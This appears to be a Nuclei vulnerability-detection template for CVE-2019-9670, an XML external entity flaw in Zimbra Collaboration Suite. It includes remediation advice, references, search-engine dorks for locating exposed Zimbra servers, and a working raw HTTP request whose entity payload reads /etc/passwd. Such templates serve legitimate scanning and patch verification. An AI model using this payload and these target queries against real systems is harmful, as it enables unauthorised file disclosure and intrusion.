Description
Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
id: CVE-2019-9670
info:
name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection
author: ree4pwn
severity: critical
description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, leading to unauthorized access to sensitive information.
remediation: |
Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/46693/
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
- https://bugzilla.zimbra.com/show_bug.cgi?id=109129
- http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
- http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
- https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9670
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9670
cwe-id: CWE-611
epss-score: 0.99986
epss-percentile: 0.99983
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: synacor
product: zimbra_collaboration_suite
shodan-query:
- http.title:"zimbra collaboration suite"
- http.title:"zimbra web client sign in"
fofa-query:
- title="zimbra web client sign in"
- title="zimbra collaboration suite"
google-query:
- intitle:"zimbra collaboration suite"
- intitle:"zimbra web client sign in"
tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor,vkev,vuln
http:
- raw:
- |
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- "Problem accessing"
condition: and
- type: status
status:
- 503
# digest: 490a00463044022035fcdfcc52b7edb45726c3e37d9c78d6c70b36e63c51892b4edcf4c947765d7d022073a19d1a2ae72fb79c5fd4bf0c1b6fe076c6ec84df7247162f832bc11b140559:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.